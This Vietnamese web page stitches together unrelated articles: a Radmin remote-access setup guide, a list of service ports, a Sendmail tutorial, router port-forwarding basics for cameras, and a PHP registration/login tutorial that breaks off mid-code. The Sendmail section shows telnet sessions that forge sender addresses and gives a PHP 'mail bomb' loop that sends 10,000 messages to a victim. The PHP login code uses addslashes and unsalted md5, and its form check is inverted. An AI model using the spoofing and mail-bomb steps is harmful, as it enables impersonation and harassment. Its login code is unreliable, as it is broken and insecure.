I. Giới thiệu:
Remote Admin (RADMIN) là một chương trình giúp bạn có thể làm việc trên một máy tính khác thông qua máy tính của bạn. Bạn có thể xem màn hình desktop, điều khiển chuột, bàn phím như là bạn đang làm việc trên máy tính của bạn vậy.II. Cấu trúc của Radmin
Hệ thống Radmin bao gồm 2 ứng dụng.
– Radmin Server, bản này được cài đặt trên máy tính ở xa hay remote computer
– Radmin Viewer, được cài đặt trên máy của bạn và nó sẽ giúp bạn hiển thị màn hình của máy remote trên màn hình máy bạn..
III. Thiết lập Ramin Server.
Sau khi cài đặt Radmin Server xong thì sẽ xuất hiện biểu tượng Ramin trên thanh taskbar. Để thiết lập cho Ramin, bạn click phải chuột và chọn “Setting For Radmin Server”. Sẽ xuất hiện cửa sổ như hình sau:
Bạn chỉ cần chú ý đến 2 nút là Startup mode, Option, và Permissions thôi.
– Startup mode: Thiết lập chế độ khởi động cho Ramin Server là Automatic (Khởi động cũng windows) hay Manual (Khởi động khi bạn cần).
– Options: Mục Options cho phép chúng đã cài đặt các thiết lập cho Radmin như: Port điều khiển, các thiết lập hiển thị, dải IP cho phép…
+ Genaral: Tại đây bạn có thể thiết lập cổng để điều khiển (cổng để Radmin Client truy cập vào).
# Port: Mặc định thì Radmin sẽ sử dụng cổng 4899. Tuy nhiên bạn có thể đổi cộng tùy thích lấy trong dải từ 1 đến 65535 (Chú ý: Bạn phải để ý khi chọn cổng, tránh trùng với các cổng đã được sử dụng).
# Miscellaneous: Cho phép hạn chế bớt quyền truy cập của client. (Ví dụ như không cho sử dụng telnet, không cho tải file trên server về…)
# IP Filter: Theo mình, nếu bạn dùng Radmin trong mạng LAN thì hãy quan tâm đến cái này. Còn nếu dùng qua Internet thì hãy bỏ qua nó.
– Permissions: Cho phép bạn thiết lập bảo mật khi remote. Tại đây có 2 tùy chọn là sử dụng luôn account của Windows hoặc tạo account riêng của Radmin. Việc phân quyền sẽ giúp cho bạn thiết lập cho User nào có thể remote đến server. Khi remote đến Server, bạn sẽ được hỏi User name và password để truy cập.
Khi sử dụng chế độ Radmin Security thì Radmin sẽ cho phép bạn tạo các User và phân quyền cho mỗi User bằng cách sử dụng Add User.
V. Sử dụng Radmin Viewer
Để kết nối đến Server, bạn Click vào Connect to… (dấu cộng màu xanh ) sẽ xuất hiện cửa sổ như sau:
+ Name of entry: Tên mô tả, bạn có thể đặt tên tùy thích
+ IP address or DNS name: Nhập địa chỉ IP hoặc DNS của máy cần remote (Radmin Server).
+ Port: Nếu trên Server bạn đặt ở port nào thì client bạn sẽ phải đặt ở port đó thì bạn mới có thể truy cập được
+ Connect throught host: Phần này giúp bạn có thể truy cập nhiều máy qua Internet thông qua một port. Điều này có nghĩa là bạn chỉ cần mở một port nào đó trên modem và trỏ đến một máy duy nhất, sau đó bạn connect vào các máy khác thông qua máy đó. Máy đó sẽ đóng vai trò như một bridge.
VI. Mở port trên modem:
Phần này chỉ cần đến khi bạn muốn remote máy server thông qua mạng Internet. Trên trang config của modem, bạn chọn phần Port Forwarding hoặc phần NAT.
Tại đây:
+ Source IP address: đây là địa chỉ RADMIN server mà bạn muốn modem trỏ đến
+ Destination IP address: Nếu bạn muốn modem trỏ đến một dải các IP thì bạn gõ vào dải đích. Còn nếu chỉ muốn trỏ đến RADMIN server thì bạn nhập Source IP và Destination IP giống nhau.
+ Phần port thì bạn dùng cổng mặc định là 4899 hoặc tùy thích hoặc một dải port.
LINK DOWNLOAD
PORT AND TCP / UDP
<service name> <port number> <protocol> [aliases…]
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/udp users #Active users
daytime 13/tcp
daytime 13/udp
qotd 17/tcp quote #Quote of the day
qotd 17/udp quote #Quote of the day
chargen 19/tcp ttytst source #Character generator
chargen 19/udp ttytst source #Character generator
ftp-data 20/tcp #FTP, data
ftp 21/tcp #FTP. control
ssh 22/tcp #SSH Remote Login Protocol
telnet 23/tcp
smtp 25/tcp mail #Simple Mail Transfer Protocol
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource #Resource Location Protocol
nameserver 42/tcp name #Host Name Server
nameserver 42/udp name #Host Name Server
nicname 43/tcp whois
domain 53/tcp #Domain Name Server
domain 53/udp #Domain Name Server
bootps 67/udp dhcps #Bootstrap Protocol Server
bootpc 68/udp dhcpc #Bootstrap Protocol Client
tftp 69/udp #Trivial File Transfer
gopher 70/tcp
finger 79/tcp
http 80/tcp www www-http #World Wide Web
hosts2-ns 81/tcp #HOSTS2 Name Server
hosts2-ns 81/udp #HOSTS2 Name Server
kerberos 88/tcp krb5 kerberos-sec #Kerberos
kerberos 88/udp krb5 kerberos-sec #Kerberos
hostname 101/tcp hostnames #NIC Host Name Server
iso-tsap 102/tcp #ISO-TSAP Class 0
rtelnet 107/tcp #Remote Telnet Service
pop2 109/tcp postoffice #Post Office Protocol – Version 2
pop3 110/tcp #Post Office Protocol – Version 3
sunrpc 111/tcp rpcbind portmap #SUN Remote Procedure Call
sunrpc 111/udp rpcbind portmap #SUN Remote Procedure Call
auth 113/tcp ident tap #Identification Protocol
uucp-path 117/tcp
sqlserv 118/tcp #SQL Services
nntp 119/tcp usenet #Network News Transfer Protocol
ntp 123/udp #Network Time Protocol
epmap 135/tcp loc-srv #DCE endpoint resolution
epmap 135/udp loc-srv #DCE endpoint resolution
netbios-ns 137/tcp nbname #NETBIOS Name Service
netbios-ns 137/udp nbname #NETBIOS Name Service
netbios-dgm 138/udp nbdatagram #NETBIOS Datagram Service
netbios-ssn 139/tcp nbsession #NETBIOS Session Service
imap 143/tcp imap4 #Internet Message Access Protocol
sql-net 150/tcp
sqlsrv 156/tcp
pcmail-srv 158/tcp #PCMail Server
snmp 161/udp #SNMP
snmptrap 162/udp snmp-trap #SNMP trap
print-srv 170/tcp #Network PostScript
bgp 179/tcp #Border Gateway Protocol
irc 194/tcp #Internet Relay Chat Protocol
ipx 213/udp #IPX over IP
rtsps 322/tcp
rtsps 322/udp
mftp 349/tcp
mftp 349/udp
ldap 389/tcp #Lightweight Directory Access Protocol
https 443/tcp MCom #HTTP over TLS/SSL
https 443/udp MCom #HTTP over TLS/SSL
microsoft-ds 445/tcp
microsoft-ds 445/udp
kpasswd 464/tcp # Kerberos (v5)
kpasswd 464/udp # Kerberos (v5)
isakmp 500/udp ike #Internet Key Exchange
crs 507/tcp #Content Replication System
crs 507/udp #Content Replication System
exec 512/tcp #Remote Process Execution
biff 512/udp comsat
login 513/tcp #Remote Login
who 513/udp whod
cmd 514/tcp shell
syslog 514/udp
printer 515/tcp spooler
talk 517/udp
ntalk 518/udp
efs 520/tcp #Extended File Name Server
router 520/udp route routed
ulp 522/tcp
ulp 522/udp
timed 525/udp timeserver
tempo 526/tcp newdate
irc-serv 529/tcp
irc-serv 529/udp
courier 530/tcp rpc
conference 531/tcp chat
netnews 532/tcp readnews
netwall 533/udp #For emergency broadcasts
uucp 540/tcp uucpd
klogin 543/tcp #Kerberos login
kshell 544/tcp krcmd #Kerberos remote shell
dhcpv6-client 546/tcp #DHCPv6 Client
dhcpv6-client 546/udp #DHCPv6 Client
dhcpv6-server 547/tcp #DHCPv6 Server
dhcpv6-server 547/udp #DHCPv6 Server
new-rwho 550/udp new-who
remotefs 556/tcp rfs rfs_server
rmonitor 560/udp rmonitord
monitor 561/udp
nntps 563/tcp snntp #NNTP over TLS/SSL
nntps 563/udp snntp #NNTP over TLS/SSL
whoami 565/tcp
whoami 565/udp
http-rpc-epmap 593/tcp #HTTP RPC Ep Map
http-rpc-epmap 593/udp #HTTP RPC Ep Map
hmmp-ind 612/tcp #HMMP Indication
hmmp-ind 612/udp #HMMP Indication
hmmp-op 613/tcp #HMMP Operation
hmmp-op 613/udp #HMMP Operation
ldaps 636/tcp sldap #LDAP over TLS/SSL
doom 666/tcp #Doom Id Software
doom 666/udp #Doom Id Software
msexch-routing 691/tcp #MS Exchange Routing
msexch-routing 691/udp #MS Exchange Routing
kerberos-adm 749/tcp #Kerberos administration
kerberos-adm 749/udp #Kerberos administration
kerberos-iv 750/udp #Kerberos version IV
ftps-data 989/tcp #FTP data, over TLS/SSL
ftps 990/tcp #FTP control, over TLS/SSL
telnets 992/tcp #Telnet protocol over TLS/SSL
imaps 993/tcp #IMAP4 protocol over TLS/SSL
ircs 994/tcp #IRC protocol over TLS/SSL
pop3s 995/tcp spop3 #pop3 protocol over TLS/SSL (was spop3)
pop3s 995/udp spop3 #pop3 protocol over TLS/SSL (was spop3)
kpop 1109/tcp #Kerberos POP
activesync 1034/tcp #ActiveSync Notifications
phone 1167/udp #Conference calling
opsmgr 1270/tcp #Microsoft Operations Manager
opsmgr 1270/udp #Microsoft Operations Manager
ms-sql-s 1433/tcp #Microsoft-SQL-Server
ms-sql-s 1433/udp #Microsoft-SQL-Server
ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
ms-sql-m 1434/udp #Microsoft-SQL-Monitor
ms-sna-server 1477/tcp
ms-sna-server 1477/udp
ms-sna-base 1478/tcp
ms-sna-base 1478/udp
wins 1512/tcp #Microsoft Windows Internet Name Service
wins 1512/udp #Microsoft Windows Internet Name Service
ingreslock 1524/tcp ingres
stt 1607/tcp
stt 1607/udp
l2tp 1701/udp #Layer Two Tunneling Protocol
pptconference 1711/tcp
pptconference 1711/udp
pptp 1723/tcp #Point-to-point tunnelling protocol
msiccp 1731/tcp
msiccp 1731/udp
remote-winsock 1745/tcp
remote-winsock 1745/udp
ms-streaming 1755/tcp
ms-streaming 1755/udp
msmq 1801/tcp #Microsoft Message Queue
msmq 1801/udp #Microsoft Message Queue
radius 1812/udp #RADIUS authentication protocol
radacct 1813/udp #RADIUS accounting protocol
msnp 1863/tcp
msnp 1863/udp
ssdp 1900/tcp
ssdp 1900/udp
close-combat 1944/tcp
close-combat 1944/udp
nfsd 2049/udp nfs #NFS server
knetd 2053/tcp #Kerberos de-multiplexor
mzap 2106/tcp #Multicast-Scope Zone Announcement Protocol
mzap 2106/udp #Multicast-Scope Zone Announcement Protocol
directplay 2234/tcp #DirectPlay
directplay 2234/udp #DirectPlay
ms-olap3 2382/tcp #Microsoft OLAP 3
ms-olap4 2383/tcp #Microsoft OLAP 4
ms-olap1 2393/tcp #Microsoft OLAP 1
ms-olap2 2394/tcp #Microsoft OLAP 2
ms-theater 2460/tcp
wlbs 2504/tcp #Microsoft Windows Load Balancing Server
wlbs 2504/udp #Microsoft Windows Load Balancing Server
ms-v-worlds 2525/tcp #Microsoft V-Worlds
sms-rcinfo 2701/tcp #SMS RCINFO
sms-xfer 2702/tcp #SMS XFER
sms-chat 2703/tcp #SMS CHAT
sms-remctrl 2704/tcp #SMS REMCTRL
msolap-ptp2 2725/tcp #MSOLAP PTP2
icslap 2869/tcp
cifs 3020/tcp
xbox 3074/tcp #Microsoft Xbox game port
xbox 3074/udp #Microsoft Xbox game port
ms-rule-engine 3132/tcp #Microsoft Business Rule Engine Update Service
msft-gc 3268/tcp #Microsoft Global Catalog
msft-gc-ssl 3269/tcp #Microsoft Global Catalog with LDAP/SSL
ms-cluster-net 3343/tcp #Microsoft Cluster Net
ms-cluster-net 3343/udp #Microsoft Cluster Net
ms-wbt-server 3389/tcp #MS WBT Server
ms-la 3535/tcp #Microsoft Class Server
pnrp-port 3540/tcp #PNRP User Port
teredo 3544/tcp #Teredo Port
p2pgroup 3587/tcp #Peer to Peer Grouping
upnp-discovery 3702/tcp #UPNP v2 Discovery
dvcprov-port 3776/tcp #Device Provisioning Port
dvcprov-port 3776/udp #Device Provisioning Port
msfw-control 3847/tcp #Microsoft Firewall Control
msdts1 3882/tcp #DTS Service Port
sdp-portmapper 3935/tcp #SDP Port Mapper Protocol
sdp-portmapper 3935/udp #SDP Port Mapper Protocol
net-device 4350/tcp #Net Device
net-device 4350/udp #Net Device
ipsec-msft 4500/tcp #Microsoft IPsec NAT-T
ipsec-msft 4500/udp #Microsoft IPsec NAT-T
dccm 5679/tcp #Direct Cable Connect Manager
ms-licensing 5720/tcp #Microsoft Licensing
ms-licensing 5720/udp #Microsoft Licensing
directplay8 6073/tcp #DirectPlay8
directplay8 6073/udp #DirectPlay8
man 9535/tcp #Remote Man Server
rasadv 9753/udp
imip-channels 11320/tcp #IMIP Channels Port
directplaysrvr 47624/tcp #Direct Play Server
directplaysrvr 47624/udp #Direct Play Server
Hiện nay có rất nhiều chương trình gởi thư nặc danh và dội bom thư như Ghost, Avalave, ..! Tuy nhiên, chúng lại đòi hỏi một máy chủ SMTP – Simple Mail Transfer Protocol(Giao thức chuyển thư đơn giản) cho phép “reply”.
Mà như bạn biết đó, khó mà có thể tìm kiếm được một SMTP server như thế. VDC, FTP cũng như các SMTP server trong nước rồi sẽ đóng cửa “reply” đối với các SMTP server của họ trong thời gian ngắn sắm tới thôi! Tìm một SMTP server của nước ngoài, không phải dễ kiếm được đâu?! Đừng sợ gì hết, đã có Sendmail giúp bạn rồi! Sendmail được cài đặt hầu hết trên các Unix * hiện nay. Đặc biệt là nó được cài đặt rất nhiều trên các web-hosting! Như vậy bạn sẽ dễ dàng kiếm được vài cái máy chủ chạy Sendmail cho mình!
Phân tích
Sendmail là gì?
Sendmail là một deamon chạy trên cổng 25. Nó dùng giao thức TCP. Gần như tất cả(99%) các máy chủ Unix* đều cài đặt Sendmail vì đây là mặc định mà! Nhiệm vụ chính, số một đó! của sendmail là phân phát thư trên mạng. Sendmail cũng gần giống như SMTP thôi, các lệnh SMTP đều có thể dùng được!
Thử gởi một lá thư nặc danh bằng Sendmail
Okay, đầu tiên hãy telnet đến máy chủ chạy Sendmail mà bạn biết, trên cổng 25! Tiếp theo bạn có thể phát lệnh SMTP bình thường để gởi thư(nếu bạn không biết thì gõ HELP để gọi hướng dẫn)! Hãy xem qua ví dụ sau:
C:\windows>telnet mail.isp.com 25
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530 (IST)
helo ankit.com
250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you
mail from: ankit@bol.net.in
250 ankit@bol.net.in … Sender ok
rcpt to: namitas@bol.net.in
250 namitas@bol.net.in … Recipient ok
data
354 Enter mail, end with “.” on a line by itself
<Hãy nhập vào nội dung thư tại đây.>
250 RAA0000001693 Message accepted for delivery
The headers of the above email as seen by the recipient is as follows:
Return-Path: < ankit@bol.net.in >
Received: from ankit.com by mail.isp.com (8.9.1/1.1.20.3/07Jul00-0916AM)
id RAA0000001693; Thu, 7 Dec 2000 17:19:49 +0530 (IST)
Date: Thu, 7 Dec 2000 17:19:49 +0530 (IST)
From: Ankit Fadia < ankit@bol.net.in >
Message-Id: < 200012071149.RAA0000001693@mail.isp.com >
X-UIDL: 920156a3b926c5193036933e6d04efd5
quit
221 Aba be
Giải thích: đầu tiên chúng ta telnet đến mail.isp.com ở cổng 25. Thật may, chúng ta nhận được một dòng thông báo rất quan trọng “ESMTP Sendmail 8.9.1″. Như vậy server này đang chạy Sendmail, ổn rồi! Tiếp theo gõ “helo ankit.com”. Hihi, đây chẳng qua là làm nhái nơi gởi thôi! Lệnh tiếp theo “mail from: ankit@bol.net.in ” cho biết lá thư này được gởi từ ankit@bol.net.in ! “rcpt to: namitas@bol.net.in ” cho biết người nhận là namitas@bol.net.in . Tiếp theo, ta gõ lệnh “data” và nhập vào nội dung của thư. Đến khi nào gõ xong rồi thì gõ <Enter> và gõ thêm một dấu chấm “.”. Như vậy là lá thư nặc danh của chúng ta đã được gởi đi rồi đó! Cuối cùng chúng ta gõ “quit” để đóng kết nối!
Có hay không có subject?
ở ví dụ trên, chúng ta không đặt subject cho thư. Theo mặc định thì Sendmail sẽ đặt subject là thời gian hiện tại trên máy chủ! Chúng ta cần thay đổi lại subject của thư..! Bằng cách nào đây? Dễ thôi, sau khi nhập xong lệnh “data”, bạn gõ vào theo dạng sau: subject: <tiêu đề thư ở đây>. Hãy xem ví dụ sau, chúng ta cần gởi một lá thư nặc danh như sau:
Mail Server: mail.isp.com
Recipient’s Email Address: namitas@bol.net.in
Sender’s Email Address: ankit@bol.net.in
Subject: Hi!!!
Body: This is a test message
C:\windows>telnet mail.isp.com
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530 (IST)
helo ankit.com
250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you
mail from: ankit@bol.net.in
250 ankit@bol.net.in … Sender ok
rcpt to: namitas@bol.net.in
250 namitas@bol.net.in … Recipient ok
data
354 Enter mail, end with “.” on a line by itself
subject: Hi!!!
This is a test message
.
250 RAA0000001693 Message accepted for delivery |
Nếu xem phần header của lá thư được gởi, bạn sẽ thấy như sau:
Return-Path: < ankit@bol.net.in >
Received: from ankit.com by mail.isp.com (8.9.1/1.1.20.3/07Jul00-0916AM)
id RAA0000001693; Thu, 7 Dec 2000 17:19:49 +0530 (IST)
Date: Thu, 7 Dec 2000 17:19:49 +0530 (IST)
From: Ankit Fadia < ankit@bol.net.in >
Message-Id: < 200012071149.RAA0000001693@mail.isp.com >
Subject: Hi!!!!
X-UIDL: 920156a3b926c5193036933e6d04efd5
This is a test message
Phần subject và body của thư được phân cách nhau bởi một dòng có nội dung “X-UIDL: 920156a3b926c5193036933e6d04efd5″!
CC và BCC!
CC – đồng gởi! Để gởi một lá thư đến nhiều người cùng một lúc, chúng ta chỉ cần dùng rcpt to:<người nhận> nhiều lần! Ví dụ, tôi cần gởi một lá thư từ test@bol.net.in đến:
To: ankit@bol.net.in ; ankitfadia@hotmail.com
CC: ankit_Fadia@hotmail.com ; namitas@bol.net.in
Chắc bạn hiểu chứ!
BCC – gởi một bản sao! Cái thì thì cũng gần giống như CC thôi. Tuy nhiên BCC làm việc trong các phiên kết nối khác nhau. Trong khi CC lại làm việc trong một phiên kết nối duy nhất. Cũng là ví dụ trên, tôi cần BCC đến 4 người là ankit@bol.net.in ; ankitfadia@hotmail.com ; ankit_Fadia@hotmail.com ; namitas@bol.net.in thì tôi thực hiện 4 kết nối đến server. Mỗi lần tôi chỉ gởi cho một người bằng lệnh “rcpt to: <người nhận>”. Thật là bất tiện phải không, tuy nhiên, cũng có cái lợi đó. ankit_Fadia@hotmail.com không thể biết được địa chỉ email của ankitfadia@hotmail.com ; ankit_Fadia@hotmail.com ; namitas@bol.net.in hoặc namitas@bol.net.in không thể biết được địa chỉ email của ankit@bol.net.in ; ankitfadia@hotmail.com ; ankit_Fadia@hotmail.com , … Trong khi nếu dùng CC thì một người trong sô họ sẽ biết được địa chỉ email của những người còn lại vì đồng gởi mà! Hi hi!
Gởi file đính kèm
Bây giờ bạn cần đính kèm một file trong thư! Trước hết bạn cần encode file này sang dạng Uue-Base64! Sau đó gộp nội dung của file đã encode sang dạng uue vào phần body của thư là xong! Ví dụ tôi cần gởi đính kèm file new.zip vào lá thư cần gởi đi. Trước hết, dùng Winzip mở file new.zip, chọn Actions/UUencode(Shift-U) để encode file new.zip sang dạng uue, new.uue. Nội dung của new.uue có dạng như sau:
_=_
_=_ Part 001 of 001 of file new.zip
_=_
begin 666 new.zip
M4$L#!!0“@`(`#5S_RCDJL7+;P“`’4““’““;F5W+F=I9G/W=+.P3)1G
MX&%8R“”_T$`Q%#\R<+(P,#(H`/B@.0=F-QZ\INZ%.\\$DX(:]”N_76TM7″V
M:6]\T+)755;)-P(C;UB]*)FR+OSYCGV’;_HI7<P)::DQ$Y_Y[%*(UX1`H4U;
M3Z55KVB;<EV#@<$:`%!+`0(4`!0“@`(`#5S_RCDJL7+;P“`’4““’““
K““““(`”V@0““!N97<N9VEF4$L%!@““`!“$`-0“`)0““““`
`
end
(3 dòng đầu _=_ … chỉ là các dùng ghi chú)
Tiếp theo là…
C:\windows>telnet mail.isp.com
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530 (IST)
helo ankit.com
250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you
mail from: ankit@bol.net.in
250 ankit@bol.net.in … Sender ok
rcpt to: namitas@bol.net.in
250 namitas@bol.net.in … Recipient ok
data
354 Enter mail, end with “.” on a line by itself
subject: Hi you!!!
Check file new.zip for fun! begin 666 new.zip
M4$L#!!0“@`(`#5S_RCDJL7+;P“`’4““’““;F5W+F=I9G/W=+.P3)1G
MX&%8R“”_T$`Q%#\R<+(P,#(H`/B@.0=F-QZ\INZ%.\\$DX(:]”N_76TM7″V
M:6]\T+)755;)-P(C;UB]*)FR+OSYCGV’;_HI7<P)::DQ$Y_Y[%*(UX1`H4U;
M3Z55KVB;<EV#@<$:`%!+`0(4`!0“@`(`#5S_RCDJL7+;P“`’4““’““
K““““(`”V@0““!N97<N9VEF4$L%!@““`!“$`-0“`)0““““`
`
end.
250 RAA0000001693 Message accepted for delivery |
Đây chỉ là ví dụ minh họa để bạn hiểu mà thôi! Nếu bạn dùng telnet chắc bạn phải gõ vào mỏi cả tay đó! Thử viết một chương trình hoặc sử dụng các chương trình email khác đi! Hihi!
Dội bom thư
Chẵng qua chỉ là gởi vô khối thư có nội dung giống nhau hoặc không ra gì đến nạn nhân! Sau đây là một ví dụ nhỏ về bom thư được viết bằng PHP!
<?
$email=” victim@mail.com ”;
$subject=”Hi you”;
$message=”No, sorry!”;
for ($i=0;$i<10000;$i++){
mail($email,$subject,$message);
}
?> |
Hi vọng qua bài viết này bạn hiểu rõ hơn về Sendmail!
Chúc bạn thành công!
Đây là bài hướng dẫn cơ bản về Port forwarding vì đây là cái việc khó khăn nhất để có thể phát huy sức mạnh của phương pháp cài đặt Camera, DVR, NVR qua mạng Internet ở Việt Nam.
Ngay từ ngày đầu sử dụng Camera mình đã toan tính từ bỏ hình thức này ít nhất là 1 lần vì khá phức tạp, nhưng khi hoàn tất công việc thì quả rất tuyệt vời nên mình share cái này cho các newbie đỡ cực nhọc.
NAT là gì?
Như chúng ta biết, trong hệ thống mạng máy tính thì quá trình chuyển đổi địa chỉ mạng (Network Address Translation – NAT ) là công việc liên quan tới việc ghi lại các địa chỉ nguồn gốc/điểm tới của các gói dữ liệu vận chuyển qua Router/Firewall ta gọi là NAT.
Port forwarding là gì?
Port forwarding là quá trình chuyển một port cụ thể trong hệ thống mạng cục bộ LAN từ một client/terminal/node qua một client/terminal/node của một network khác, điều này sẽ cho phép các clients/terminals/nodes bên ngoài có thể truy cập vào clients/terminals/nodes trong mạng LAN bằng cách sử dụng cái port đó từ bên ngoài thông qua cái Router/Modem/Firewall đã mở chức năng NAT.
Như vậy, các máy tính từ xa (máy vòng quanh thế giới trên internet ấy) sẽ sử dụng Port forwarding để kết nối với một máy tính khác trong mạng LAN và đây cũng chính là cách mà các chương trình Camera sử dụng để chia sẻ file giữa 2 máy tính với nhau nên ta còn gọi là peer to peer (PP) sharing đó.
Port là gì?
Khi chúng ta kết nối vào Internet thì có rất nhiều đường vận chuyển dữ liệu khác nhau được sử dụng, máy vi tính sẽ âm thầm điều hành một cách chính xác các công việc vận chuyển đó thông qua rất nhiều port khác nhau. VD: Giao thức MSN hay dùng các port: 6891-6900, Giao thức HTTP thì hay dùng port 80…
ADSL Router/DSL Router liên quan gì?
Chúng ta cần lưu ý là các DSL/ADSL Router sẽ phân máy tính chúng ta ra làm 2 vòng:
– Vòng 1 thì là Private LAN, các máy tính trong Private LAN này thì gọi là các Local IP, Private IP. Các Private IP này nếu được modem cấp phát tự động thông qua chức năng DHCP thì gọi là IP động, khi ta Forward port thì cần điền vào một IP cố định còn gọi là IP tĩnh.
– Vòng 2 là WAN (Wide Area Network), tại đây thì các IP được nhà cung cấp dịch vụ như FPT,Viettel,VDC,Netnam cung cấp cho ta để kết nối ta ra Internet. Tuỳ theo gói dịch vụ ta sẽ có IP tĩnh (cố định) hay IP động (thay đổi mỗi khi tắt modem).
Các router này sẽ chịu trách nhiệm trong việc điều khiển lưu lượng dữ liệu tới các máy tính khác nhau connect vô, nó cũng sử dụng chức năng Port forward để điều khiển các gói dữ liệu tới các máy tính khác nhau thông qua các port. Các router này thường tích hợp thêm Firewall để ngăn chặn các cuộc gọi (luồng truy cập) in/out ngoài luồng không khai báo vì vậy khi chúng ta làm công việc Port forward chính là ta khai báo luồng truy cập để các gói dữ liệu không bị chặn lại khi download/upload dữ liệu.
Ví dụ đây, khi ta đã khai báo mở port 6881 thì các gói dữ liệu (xanh) sẽ được router chuyển về đúng máy đích. Nhưng cái port 1111 chưa khai báo và cái IP 192.168.0.1 và 192.168.0.2 không phải là IP của Router nên các gói dữ liệu bị loại bỏ (xem hình).
Học thuyết port forward học
Thông thường, có hai cách để mở port máy mình ra Internet nhằm truy cập qua lại giữa các máy tính trong LAN và ngoài Internet trên hầu hết các DSL/ADSL Router là: DMZ và port forward.
– Cách 1: dùng DMZ: cái này là cách đơn giản và dễ nhất, chỉ cẩn Enable DMZ và thêm (add) một IP (một computer: ví dụ: 10.0.0.200) vào DMZ thì lập tức cái máy có IP đó sẽ mở hết các cổng ra Internet, tức là sẽ chẳng còn firewall nữa. Và việc sau cùng là cấu hình Microsoft Windows và DVR, Camera là xong và tất nhiên ta thích dùng port nào trên Camera cũng được.
– Cách 2: IP, Port forward: là việc cần thiết để mở cửa giữa Camera IP, DVR, NVR và máy quan sát từ xa để đạt được tốc độ transfer giữa hai máy một cách tối ưu (cao nhất). Đa số các DSL Router hoặc DSL Modem có NAT đều sử dụng firewall để chặn các dòng truy cập từ các máy trong LAN (internal network) với mạng Internet, một đường mòn được đào (open/ forward) xuyên qua firewall để các máy tính trong LAN có thể truy cập vào được với máy tính ngoài Internet thông qua 1 cổng (port) xác định ta gọi là port forward. Tức là ta sẽ điền một port và một IP vào chỗ Virtual sever/Port forward trong modem, việc sau cùng là add cái IP này cho Windows và add cái port này vào DVR, Camera là xong.
Chính vì vậy port forward là giải pháp an toàn hơn khi mở cổng máy mình với Internet cho dù cấu hình khó hơn sử dụng DMZ vì chỉ có 1 port (hoặc vài port) được mở.
Chúc các bạn thành công!
Bạn đang làm 1 website ? Site của bạn thuộc dạng chuyên nghiệp ? hay nghiệp dư ? … thì cơ bản bạn cũng phải cần đến 1 trang đăng ký dùng để tạo tài khoản và trang đăng nhập dùng để truy nhập tài khoản đã đăng ký.
Trong phạm vi bài viết này tôi sẽ trình bày cách viết 1 trang đăng ký, đăng nhập cơ bản mà bạn có thể ứng dụng ngay
1. Tạo kết nối database:
Tạo file “mysql.php” có code như sau:
<?php
$db_host = “localhost”; // Giữ mặc định là localhost
$db_name = “tuonglua.net”; // Cần thay đổi..
$db_username = “tuonglua”; // Cần thay đổi..
$db_password = “123456″; // Cần thay đổi..
@mysql_connect(“{$db_host}”, “{$db_username}”, “{$db_password}”) or die(“Không thể kết nối database”);
@mysql_select_db(“{$db_name}”) or die(“Không thể chọn database”);
?>
Bạn cần phải thay đổi thông tin ở 3 biến $db_name, $db_username, $db_password cho phù hợp với thông tin database của bạn.
1.1. Tạo table “members” dùng dể chứa thông tin thành viên:
Sau đó bạn tạo file “create_members_table.php” có code như sau:
<?php
require_once(“mysql.php”);
@mysql_query(“CREATE TABLE `members` (
`id` INT( 11 ) NOT NULL AUTO_INCREMENT ,
`username` VARCHAR( 128 ) NOT NULL ,
`password` VARCHAR( 32 ) NOT NULL ,
`email` VARCHAR( 255 ) NOT NULL ,
PRIMARY KEY ( `id` )
) TYPE = MYISAM ;”);
print “Table \”members\” đã được tạo.”;
?>
Bạn tiếp tục chạy luôn file “create_members_table.php” này để tiến hành tạo table “members”, sau khi tạo xong thì xóa file này đi. Nếu bạn đã quen sử dụng phpMyAdmin thì bạn có thể tự tạo table này, còn đối với newbie thì nên làm theo cách của tôi, sau này bạn có thể tự tìm hiểu thêm.
2. Tạo trang đăng ký:
Tạo file “register.php” có code như sau:
<?php
// Tải file mysql.php lên
require_once(“mysql.php”);
if ( $_GET[‘act’] == “do” )
{
// Dùng hàm addslashes() để tránh SQL injection, dùng hàm md5() để mã hóa password
$username = addslashes( $_POST[‘username’] );
$password = md5( addslashes( $_POST[‘password’] ) );
$verify_password = md5( addslashes( $_POST[‘verify_password’] ) );
$email = addslashes( $_POST[’email’] );
// Kiểm tra 4 thông tin, nếu có bất kỳ thông tin chưa điền thì sẽ báo lỗi
if ( $username || $password || $verify_password || $email )
{
print “Xin vui lòng nhập đầy đủ các thông tin. <a href=’javascript:history.go(-1)’>Nhấp vào đây để quay trở lại</a>”;
exit;
}
// Kiểm tra mật khẩu, bắt buộc mật khẩu nhập lúc đầu và mật khẩu lúc sau phải trùng nhau
if ( $password != $verify_password )
{
print “Mật khẩu không giống nhau, bạn hãy nhập lại mật khẩu. <a href=’javascript:history.go(-1)’>Nhấp vào đây để quay trở lại</a>”;
exit;
}
// Tiến hành tạo tài khoản
@mysql_query(“INSERT INTO members (username, password, email) VALUES (‘{$username}’, ‘{$password}’, ‘{$email}’)”);
// Thông báo hoàn tất việc tạo tài khoản
print “Tài khoản {$username} đã được tạo. <a href=’login.php’>Nhấp vào đây để đăng nhập</a>”;
}
else
{
// Form đăng ký
print <<<EOF
<form action=”register.php?act=do” method=”post”>
Tên truy nhập: <input type=”text” name=”username” value=””>
Mật khẩu: <input type=”password” name=”password” value=””>
Xác nhận mật khẩu: <input type=”password” name=”verify_password” value=””>
Địa chỉ E-mail: <input type=”text” name=”email” value=””>
<input type=”submit” name=”submit” value=”Đăng ký tài khoản”>
</form>
EOF;
}
?>
3. Tạo trang đăng nhập:
Tạo file “login.php” có code như sau:
<?php
// Tải file mysql.php lên
require_once(“mysql.php”);
if ( $_GET[‘act’] == “do” )
{
// Dùng hàm addslashes() để tránh SQL injection, dùng hàm md5() để mã hóa password
$username = addslashes( $_POST[‘username’] );
